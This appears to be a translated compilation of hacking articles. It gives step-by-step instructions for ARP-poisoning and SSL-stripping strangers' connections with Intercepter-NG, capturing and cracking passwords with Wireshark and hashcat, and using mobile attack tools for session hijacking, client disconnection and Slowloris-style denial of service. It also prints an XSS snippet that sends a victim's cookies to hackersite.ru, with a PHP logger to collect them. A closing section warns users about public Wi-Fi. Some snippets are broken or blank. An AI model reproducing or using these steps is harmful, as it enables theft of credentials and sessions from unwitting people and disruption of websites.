How to intercept data. Experiment: How to Steal Identity Using Free Wi-Fi. Protecting cookies from hacking

The method is old, but effective, we will do everything with intercepter ng.
1. Download the program sniff.su
2. Launch, select the network, switch the type Ethernet / WiFi if you have WiFi then you must select the icon WiFI(to the left of the network selection)

SpoilerTarget "> Spoiler

3. Push the button Scan Mode(radar icon)
In an empty field, right-click and click in context menu Smart scan.
All devices connected to the network will be shown. Select a victim (you can select everyone with the key pressed Shift), just do not mark the router itself, its IP usually 192.168.1.1
Having selected, right-click and click Add to nat

SpoilerTarget "> Spoiler

4. Go to the tab Nat
V Stealth ip it is advisable to change the last digit, to any unoccupied one, this will hide your real IP.
We put a check mark on SSl Strip and SSL Mitm.(v 0.9.10 click on the eye in the hat and choose there)

SpoilerTarget "> Spoiler

5. Push Settings(gears on the right).
We put a tick on Resurrection(This will intercept passwords and cookies of encrypted HTTPS protocol) and remove Spoof IP / Mac... You can put a tick on Cookie killer, thanks to her, the victim will be thrown out of the current page, for example, a social network and the victim will have to re-enter the password, and we will intercept it. Compare the settings with the picture.

SpoilerTarget "> Spoiler

6. Press the button at the top Start / stop sniffing(triangle), in the same window, click the radiation icon below Start / Stop ARP Poison. Go to the tab Password mode and click in the window with the right mouse button and select Show Cookies("This will allow showing cookies and passwords entered by victims")
Everything, we are waiting for someone to enter the password. Sometimes it happens that the Internet stops working, try to go online yourself, if it does not work, restart the program.
I noticed that it is not always possible to intercept the password, but in fact it works almost without failure.

Many users do not even realize that by filling in the login and password when registering or authorizing on a closed Internet resource and pressing ENTER, this data can easily be intercepted. Very often they are transmitted over the network in an unprotected form. Therefore, if the site on which you are trying to log in uses the HTTP protocol, then it is very easy to capture this traffic, analyze it using Wireshark, and then use special filters and programs to find and decrypt the password.

The best place to intercept passwords is in the core of the network, where traffic of all users goes to closed resources (for example, mail) or in front of the router to access the Internet, when registering with external resources. We set up a mirror and we are ready to feel like a hacker.

Step 1. Install and run Wireshark to capture traffic

Sometimes it is enough to select only the interface through which we plan to capture traffic and click the Start button. In our case, we capture over the wireless network.

Traffic capture has begun.

Step 2. Filtering captured POST traffic

We open a browser and try to log in to any resource using a username and password. Upon completion of the authorization process and opening the site, we stop capturing traffic in Wireshark. Next, open the protocol analyzer and see a large number of packets. It is at this stage that most IT professionals give up because they don't know what to do next. But we know and we are interested in specific packages that contain POST data, which are formed on our local machine when filling out the form on the screen and sent to remote server when you click the "Login" or "Authorization" button in the browser.

We enter a special filter in the window to display captured packets: http.request.method == “POST "

And instead of a thousand packages, we see only one with the data we are looking for.

Step 3. Find the username and password

Quick right-click and select the item from the menu Follow TCP Steam

After that, text will appear in a new window, which in the code restores the content of the page. Let's find the fields "password" and "user", which correspond to the password and username. In some cases, both fields will be easy to read and not even encrypted, but if we are trying to capture traffic when accessing very well-known resources such as Mail.ru, Facebook, Vkontakte, etc., then the password will be encoded:

HTTP / 1.1 302 Found

Server: Apache / 2.2.15 (CentOS)

X-Powered-By: PHP / 5.3.3

P3P: CP = "NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Set-Cookie: password = ; expires = Thu, 07-Nov-2024 23:52:21 GMT; path = /

Location: loggedin.php

Content-Length: 0

Connection: close

Content-Type: text / html; charset = UTF-8

Thus, in our case:

Username: networkguru

Password:

Step 4. Determining the type of encoding to decrypt the password

We go, for example, to the site http://www.onlinehashcrack.com/hash-identification.php#res and enter our password in the identification window. I was given a list of coding protocols in order of priority:

Step 5. Decrypting user password

At this stage, we can use the hashcat utility:

~ # hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

At the output, we received a decrypted password: simplepassword

Thus, using Wireshark, we can not only solve problems in the operation of applications and services, but also try ourselves as a hacker, intercepting passwords that users enter in web forms. You can also find out passwords to mailboxes users using simple filters to display:

• The POP protocol and filter looks like this: pop.request.command == "USER" || pop.request.command == "PASS"
• IMAP and filter will be: imap.request contains "login"
• SMTP protocol and you will need to enter the following filter: smtp.req.command == "AUTH"

and more serious utilities for decrypting the encoding protocol.

Step 6. What if the traffic is encrypted and using HTTPS?

There are several options to answer this question.

Option 1. Connect to disconnect the connection between the user and the server and capture the traffic at the moment the connection is established (SSL Handshake). At the moment of establishing a connection, you can intercept the session key.

Option 2. You can decrypt HTTPS traffic using the session key log file recorded by Firefox or Chrome. To do this, the browser must be configured to write these encryption keys to a log file (example based on FireFox) and you should get this log file. Basically, you need to steal the session key file with hard disk another user (which is illegal). Well, then grab traffic and use the resulting key to decrypt it.

Clarification. We are talking about the web browser of a person who is trying to steal a password. If we mean decrypting our own HTTPS traffic and want to practice, then this strategy will work. If you're trying to decrypt other users' HTTPS traffic without accessing their computers, it won't work - that's both encryption and privacy.

After receiving the keys for option 1 or 2, you need to register them in WireShark:

1. Go to the Edit - Preferences - Protocols - SSL menu.
2. Set the flag "Reassemble SSL records spanning multiple TCP segments".
3. "RSA keys list" and click Edit.
4. We enter data in all fields and write the path in the file with the key

WireShark can decrypt packets that are encrypted using the RSA algorithm. If DHE / ECDHE, FS, ECC algorithms are used, the sniffer is not our assistant.

Option 3. Get access to the web server used by the user and get the key. But this is even more challenging. In corporate networks, for the purpose of debugging applications or content filtering, this option is implemented on a legal basis, but not for the purpose of intercepting user passwords.

BONUS

VIDEO: Wireshark Packet Sniffing Usernames, Passwords, and Web Pages

“A smartphone with hacking tools? There is no such thing, ”we would have told you just recently. It was possible to launch some familiar tools for implementing attacks only on some Maemo. Now, many familiar tools have been ported to iOS and Android, and some hack-tools have been specially written for the mobile environment. Can a smartphone replace a laptop in penetration tests? We decided to check.

ANDROID

Android is a popular platform not only for mere mortals, but also for the right people. The number of useful] [- utilities is simply off scale. For this, we can say thanks to the UNIX roots of the system - it greatly simplified the porting of many tools to Android. Alas, some of them are not allowed by Google in the Play Store, so you will have to install the corresponding APKs manually. Also, for some utilities, you need maximum access to the system (for example, the iptables firewall), so you should take care of root access in advance. Each manufacturer uses its own technology, but it is quite easy to find the necessary instructions. A decent set of HOWTOs has been put together by the LifeHacker resource (bit.ly/eWgDlu). However, if some model could not be found here, the XDA-Developers forum (www.xda-developers.com) always comes to the rescue, where you can find various information on virtually any Android phone model. One way or another, some of the utilities described below will work without root access.

Let's start with an unusual package manager. The developers call it "superuser utilities", and this is not far from the truth. After installing BotBrew, you get a repository from where you can download a huge number of familiar tools compiled for Android. Among them: Python and Ruby interpreters for running numerous tools that are written in them, tcpdump sniffer and Nmap scanner for network analysis, Git and Subversion for working with version control systems, and much more.

Network scanners

An inconspicuous smartphone that, unlike a laptop, easily fits into your pocket and never arouses suspicion, can be useful for network exploration. We have already said how you can install Nmap above, but there is another option. PIPS is a specially adapted, albeit unofficial port of the Nmap scanner for Android. This means that you can quickly find active devices on the network, determine their OS using fingerprinting options, perform port scans - in short, do everything that Nmap is capable of.

With Nmap, for all its power, there are two problems. Firstly, the parameters for scanning are transmitted through the launch keys, which you need not only to know, but also to be able to enter from an inconvenient mobile keyboard. And secondly, the scan results in the console output are not as descriptive as we would like. The Fing scanner is devoid of these shortcomings, which scans the network very quickly, does fingerprinting, after which it displays a list of all available devices in an understandable form, dividing them by type (router, desktop, iPhone, and so on). At the same time, for each host, you can quickly see a list of open ports. And right from here you can connect, say, to FTP using the FTP client installed in the system - it's very convenient.

When it comes to analyzing a specific host, NetAudit can be indispensable. It works on any Android device (even a non-rooted one) and allows you not only to quickly identify devices on the network, but also to investigate them using a large fingerprinting database to determine the operating system, as well as CMS systems used on the web server. Now there are more than 3000 digital prints in the database.

If, on the contrary, you need to work at a lower level and thoroughly investigate the operation of the network, then you cannot do without Net Tools. This is an indispensable set of utilities in the work of a system administrator that allows you to fully diagnose the operation of the network to which the device is connected. The package contains more than 15 different kinds of programs, such as ping, traceroute, arp, dns, netstat, route.

Traffic manipulation

The tcpdump-based sniffer honestly logs all data into a pcap file, which can then be examined using familiar utilities like Wireshark or Network Miner. Since it does not implement any opportunities for MITM attacks, it is rather a tool for analyzing its traffic. For example, this is a great way to learn what programs installed on your device from questionable repositories are transmitting.

If we talk about combat applications for Android, then one of the most sensational is FaceNiff, which implements interception and injection into intercepted web sessions. By downloading the APK package with the program, you can launch this hack-tool on almost any Android smartphone and, by connecting to a wireless network, intercept accounts of various services: Facebook, Twitter, VKontakte, and so on - more than ten in total. Session hijacking is carried out by means of an ARP spoofing attack, but the attack is possible only on unprotected connections (FaceNiff cannot wedge into SSL traffic). To restrain the flow of scriptdis, the author limited the maximum number of sessions to three - then you need to contact the developer for a special activation code.

If the creator of FaceNiff wants money for using, then DroidSheep is a completely free tool with the same functionality. True, on the official website you will not find the distribution kit (this is due to the harsh laws of Germany regarding security utilities), but you can easily find it on the Web. The main task of the utility is to intercept user web sessions of popular social networks, implemented using the same ARP Spoofing. But with secure connections the trouble: like FaceNiff, DroidSheep flatly refuses to work with the HTTPS protocol.

This utility also demonstrates the insecurity of open wireless networks, but in a slightly different plane. It does not intercept user sessions, but it allows HTTP traffic to pass through itself using a spoofing attack, performing specified manipulations with it. Starting from the usual pranks (replacing all the pictures on the site with trollfaces, flipping all the images, or, say, replacing the Google search results) and ending with phishing attacks when fake pages of such popular services as facebook.com, linkedin.com, vkontakte.ru and many others.

If you ask which hack utility for Android is the most powerful, then Anti probably has no competitors. This is a real hacker harvester. The main task of the program is to scan the network perimeter. Further, various modules enter the battle, with the help of which a whole arsenal is implemented: this is listening to traffic, and performing MITM attacks, and exploiting the vulnerabilities found. True, there are also disadvantages. The first thing that catches your eye is that vulnerabilities are exploited only from the central server of the program, which is located on the Internet, as a result of which you can forget about goals that do not have an external IP address.

Tunneling traffic

Well known file manager now on smartphones! As in the desktop version, there is a plug-in system for connecting to various network directories, as well as the canonical two-pane mode - especially convenient on tablets.

Okay, but how do you keep your data safe on an open wireless network? Besides the VPN that Android supports out of the box, you can set up an SSH tunnel. For this there is a wonderful utility SSH Tunnel, which allows you to wrap the traffic of selected applications or the entire system through a remote SSH server.

It is often necessary to send traffic through a proxy or sox, in which case ProxyDroid will help out. It's simple: you choose which applications' traffic you want to tunnel, and specify the proxy (HTTP / HTTPS / SOCKS4 / SOCKS5 are supported). If authorization is required, then ProxyDroid also supports this. By the way, the configuration can be linked to a specific wireless network by making different settings for each of them.

Wireless networks

The built-in wireless manager is not very informative. If you need to quickly get a complete picture of nearby access points, then Wifi utility Analyzer is a great choice. It will not only show all nearby access points, but also display the channel on which they work, their MAC address and, most importantly, the type of encryption used (seeing the cherished letters "WEP", we can assume that access to the secure network is provided ). In addition, the utility is ideal if you need to find where the desired access point is physically located, thanks to a clear signal strength indicator.

This utility, according to its developer, can be useful when the wireless network is packed to capacity with clients who use the entire channel, and at this very moment you need a good connection and stable connection. WiFiKill allows you to disconnect clients from the Internet both selectively and according to a specific criterion (for example, it is possible to joke over all apple trees). The program just performs an ARP spoofing attack and redirects all clients to themselves. This algorithm is foolishly simply implemented on the basis of iptables. Such is the control panel for wireless fast food networks :).

Web application audit

Manipulating HTTP requests from a computer is a breeze, there are a huge number of utilities and browser plugins for this. In the case of a smartphone, things are a little more complicated. HTTP Query Builder will help you send a custom HTTP request with the parameters you need, for example, the desired cookie or a modified User-Agent. The result of the query execution will be displayed in a standard browser.

If the site is password protected using Basic Access Authentication, then you can check its reliability using the Router Brute Force ADS 2 utility. Initially, the utility was created to brute force passwords to the router admin area, but it is clear that it can be used against any other resource with similar protection ... The utility works, but is clearly damp. For example, the developer does not provide for brute force, but only brute force is possible using the dictionary.

You've probably heard of such a notorious program for disabling web servers like Slowloris. Its principle of operation: create and hold maximum amount connections to a remote web server, thus preventing new clients from connecting to it. So, AnDOSid is an analogue of Slowloris right in your Android device! I'll tell you a secret, two hundred connections are enough to ensure unstable work of every fourth website under the control of the Apache web server. And all this - from your phone!

Miscellaneous utilities

When working with many web applications and analyzing their logic, it is quite common to encounter data transmitted in encoded form, namely Base64. Encode will help you decode this data and see what exactly is stored in it. Perhaps, substituting a quotation mark, encoding them back into Base64 and substituting them in the URL of the site under investigation, you will receive the coveted error of executing a query to the database.

If you need a hex editor, Android has one too. With the help of HexEditor, you can edit any files, including system files, if you raise the program to superuser rights. Great replacement standard editor texts, which allows you to easily find the desired piece of text and change it.

Remote access

After gaining access to a remote host, you need to be able to use it. And this requires clients. Let's start with SSH, where ConnectBot is already the de facto standard. In addition to user-friendly interface, provides the ability to organize secure tunnels over SSH connections.

A useful program that allows you to connect to a remote desktop via RDP or VNC services. I am very glad that these are two clients in one, there is no need to use different tools for RDP and VNC.

MIB browser specially written for Android, with which you can manage network devices using SNMP protocol. It can be useful for developing an attack vector on various routers, because the standard community string (in other words, a password for access) for management via SNMP has not yet been canceled.

iOS

The iOS platform is no less popular among developers of security utilities. But if in the case of Android, root rights were needed only for some applications, then on Apple devices, jailbreak is almost always required. Fortunately, even for latest firmware iDevices (5.1.1) already have a jailbreak tool. Along with full access, you also get an alternative Cydia application manager, which already contains many utilities.

Working with the system

The first thing to start with is installing the terminal. For obvious reasons, it is not included in the standard delivery of the mobile OS, but we need it to run the console utilities, which we will talk about further. The best implementation of a terminal emulator is MobileTerminal - it supports several terminals at once, gestures for control (for example, for transferring Control-C) and generally impresses with its thoughtfulness.

Another, more difficult option to access the device console is to install OpenSSH on it (this is done through Cydia) and connect to it locally via an SSH client. If you use the correct client like iSSH, which has amazingly implemented control with touch screen, then this method is even more convenient than through MobileTerminal.

Data interception

Now that you have access to the console, you can try the utilities. Let's start with Pirni, which went down in history as a full-fledged sniffer for iOS. Unfortunately, structurally limited Wi-Fi module, built into the device, cannot be switched to promiscious mode, which is necessary for normal data interception. So, to intercept data, classic ARP spoofing is used, with the help of which all traffic is passed through the device itself. The standard version of the utility is launched from the console, where, in addition to the parameters of the MITM attack, the name of the PCAP file is specified, into which all traffic is logged. The utility has a more advanced version - Pirni Pro, which boasts graphical interface... Moreover, she knows how to parse HTTP traffic on the fly and even automatically extract interesting data from there (for example, logins and passwords), using for this regular expressions which are set in the settings.

The notorious sniffer Intercepter-NG, which we have written about many times, has recently had a console version. As the author says, most of the code is written in pure ANSI C, which behaves the same in almost any environment, so the console version worked from the very beginning on both desktop Windows, Linux and BSD, as well as mobile platforms, including iOS and Android. V console version we have already implemented the grabbing of passwords transmitted over various protocols, interception of messenger messages (ICQ / Jabber and many others), as well as the resurrection of files from traffic (HTTP / FTP / IMAP / POP3 / SMTP / SMB). At the same time, network scanning functions and high-quality ARP Poison are available. For correct operation, you must first install the libpcap package via Cydia (do not forget to enable developer packages in the settings). The entire startup instruction boils down to setting the correct rights: chmod + x intercepter_ios. Further, if you run the sniffer without parameters, a clear interactive interface Itercepter appears, allowing you to launch any attacks.

It's hard to believe, but this most complex tool for implementing MITM attacks was still ported to iOS. After colossal work, it turned out to make a full-fledged mobile port. To save yourself from dancing with a tambourine around dependencies during self-compilation, it is better to install the already built package using Cydia, after adding theworm.altervista.org/cydia (TWRepo repository) as a data source. The set also includes the etterlog utility, which helps to extract various types of traffic from the collected dump useful information(for example, FTP access accounts).

Analysis of wireless networks

In old iOS versions the craftsmen ran aircrack and could break the WEP key, but we checked: the program does not work on new devices. Therefore, to explore Wi-Fi, we will have to be content with only Wi-Fi scanners. WiFi Analyzer analyzes and displays information about all available 802.11 networks around, including information about SSID, channels, vendors, MAC addresses and encryption types. The utility builds visual graphs in real time based on the data present on the air. With such a program, it is easy to find the physical location of the point, if you suddenly forgot it, and, for example, look at the WPS PIN, which can be useful for connection.

Network scanners

What program does any pen tester use anywhere in the world, regardless of goals and objectives? Network scanner. And in the case of iOS, it will most likely be the most powerful Scany toolkit. With a set of built-in utilities, you can quickly get a detailed picture of network devices and, for example, open ports. In addition, the package includes network testing utilities such as ping, traceroute, nslookup.

However, many people prefer Fing. The scanner has a fairly simple and limited functionality, but it is quite enough for the first acquaintance with the network of, say, a cafeteria :). The results display information about available services on remote machines, MAC addresses and hostnames connected to the scanned network.

It would seem that everyone forgot about Nikto, but why? After all, this web vulnerability scanner, written in a scripting language (namely Perl), you can easily install through Cydia. This means that you can easily launch it on your jailbroken device from the terminal. Nikto will be happy to provide you with additional information on the tested web resource. In addition, you can add your own search signatures to its knowledge base with your own hands.

This powerful tool for automatic exploitation of SQL vulnerabilities is written in Python, which means that, having installed the interpreter, it can be used without any problems directly from a mobile device.

Remote control

Many network devices (including expensive routers) are SNMP-managed. This utility allows you to scan subnets for available SNMP services with a previously known community string value (in other words, standard passwords). Note that searching for SNMP services with standard community strings (public / private) in an attempt to gain access to device management is an integral part of any penetration test, along with identifying the perimeter itself and exposing the services.

Two utilities from the same manufacturer are designed to connect to a remote desktop using the RDP and VNC protocols. Similar utilities in App Store many, but these are especially convenient to use.

Password recovery

The legendary program that helps millions of hackers around the world to "remember" the password has been ported to iOS. Now it is possible to brute-force passwords for services such as HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 and many others directly from the iPhone. However, for a more effective attack, it is better to stock up on good dictionaries for brute force.

Everyone knows firsthand such a vulnerability as the use of standard passwords. Pass Mule is a kind of directory that contains all kinds of standard logins and passwords for network devices. They are conveniently categorized by vendor name, product, and model, so finding the right one is easy. The program is more likely designed to save time searching for a manual for a router, the standard login and password for which you need to find out.

Exploiting vulnerabilities

It's hard to imagine a more hacky utility than Metasploit - and it is it that concludes our today's review. Metasploit is a package of various tools, the main task of which is to exploit vulnerabilities in software... Imagine: about 1000 reliable, proven and necessary Everyday life exploit pentester - right on your smartphone! With the help of such a tool, you can really settle in any network. Metasploit allows you to not only exploit gaps in server applications- tools are also available for attacks on client applications (for example, through the Browser Autopwn module, when a combat load is inserted into client traffic). Here I must say that mobile version There is no toolkit, but you can install a standard package on your Apple device using.

What is a cookie?

There is a mechanism that allows the http server to save some text information, and then contact her. This information called a cookie. In fact, each cookie is a pair: the name of the parameter and its value. Also, each cookie is assigned the domain to which it belongs. For security reasons, in all browsers, the http server is only allowed to access the cookie for its domain. Additionally, cookies can have an expiration date, then they will be stored on the computer until this date, even if you close all browser windows.

In all multi-user systems, cookies are used to identify a user. Rather, the current connection of the user to the service, user session. If someone recognizes your cookies, they can log in on your behalf. Because at the moment very few Internet resources are checking the change of IP-address during one user session.

Browser developers do not provide built-in cookie editing tools. But you can get by with a regular notepad.

Windows Registry Editor Version 5.00



@ = "C: \\ IE_ext.htm"

We save it under the name IE_ext.reg

Step 2: Using the created file, add changes to the Windows registry.

Step 3: create a text file with text

< script language = "javascript">
external.menuArguments.clipboardData.setData ("Text", external.menuArguments.document.cookie);

external.menuArguments.document.cookie = "testname = testvalue; path = /; domain = testdomain.ru";
alert (external.menuArguments.document.cookie);

Step 4: We go to the website of interest to us.

Step 5: Right button mouse clicks on free space page and select the menu item "Working with Cookies"... We allow access to the clipboard. Your cookies for this site will appear on the clipboard. You can paste their notepad and see.

Step 6: To change some cookie, edit the file C: \ IE_ext.htm, replacing testname to the name of the cookie, testvalue- on its value, testdomain.ru- to the site domain. If necessary, add more similar lines. For ease of control, I added the output of the current cookies before and after the change to the script: alert (external.menuArguments.document.cookie);

Step 7: Perform Step 5 again, and then refresh the page.

Bottom line: we will go to this website with updated cookies.

How to steal a cookie using JavaScript?

If an attacker managed to find a way to execute arbitrary JavaScript on the victim's computer, then he can read the current cookies very easily. Example:

var str = document.cookie;

But will he be able to transfer them to his site, because, as I mentioned earlier, a JavaScript script will not be able to access a site located in a different domain without additional confirmation? It turns out that a JavaScript script can load any image located on any http server. At the same time, send any text information in the download request to this picture. Example: http://hackersite.ru/xss.jpg?text_info Therefore, if you run this code:

var img = new Image ();

img.src = "http://hackersite.ru/xss.jpg?"+ encodeURI (document.cookie);

How to handle such requests to upload a "picture"?

An attacker only needs to find a hosting with php support and place code there like this:

$ uid = urldecode ($ _ SERVER ["QUERY_STRING"]);
$ fp = fopen ("log.txt", "a");
fputs ($ fp, "$ uid \ n");
fclose ($ fp);
?>

Then all parameters of requests to this script will be saved in the file log.txt... It remains only in the previously described JavaScript script to replace http://hackersite.ru/xss.jpg to the path to this php script.

I have shown only the simplest way to exploit XSS vulnerabilities. But this proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.

Internet users are so reckless that it is easy for them to lose their confidential data. 42.tut conducted an experiment to show how many "holes" there are in public Wi-Fi networks. The conclusion is disappointing: anyone without special skills and knowledge can compile a complete dossier about a person using only an open wireless network.

We installed several applications for the experiment. They differ in functionality, but they have the same essence - to collect everything that passes through the network to which the device is connected. None of the programs are positioning themselves as "pirate", "hacker" or illegal - they can be downloaded from the net without any problems. The experiment was carried out in a mall with free Wi-Fi.

Interception

We connect to Wi-Fi: there is no password, the name of the network contains the word “free”. We start scanning, one of the programs immediately finds 15 connections to the network. For each you can see the IP-address, MAC-address, for some - the name of the device manufacturer: Sony, Samsung, Apple, LG, HTC ...

We find the “victim's” laptop among the devices. We connect to it - data that passes through the network begins to appear on the screen. All information is structured by time, there is even a built-in viewer of intercepted data.

User identification

We continue to observe. An online game has clearly begun on the partner's laptop: software commands are constantly being sent to the network, information about the situation on the battlefield is being received. You can see the nicknames of the opponents, their game levels and much more.

The message “VKontakte” comes. In one of the detailed message specifications, we find that each of them has a user ID visible. If you paste it into a browser, it will open the account of the person who received the message.

At this time, the "victim" writes a response to the message, and clearly does not realize that we are staring at the photos in his account with might and main. One of the social network applications gives a signal - we can listen to this sound in the player.

Passwords and messages

Photos and sounds are not all that can be “given” to available Wi-Fi. For example, one of the programs has a separate tab to track exactly the correspondence in social networks and instant messengers. Messages are decrypted and sorted by the time they were sent.

Demonstrating someone else's correspondence is already beyond good and evil. But it works. As an illustration - a part of the dialogue of the author of the text, caught by the tracking computer from the “victim” device.

Another program separately stores all cookies and user information, including passwords. Fortunately, in encrypted form, but immediately suggests installing a utility that will decrypt them.

conclusions

Almost any information can be lost over Wi-Fi. Many public networks do not provide any protection at all, and sometimes even a password. This means that the traffic of colleagues, friends or strangers can be intercepted by anyone.

The most reliable way out of this situation is one: do not transmit any important information through public networks. For example, do not send phones and passwords in messages and do not pay with a payment card outside the home. The risk of losing personal data is extremely high.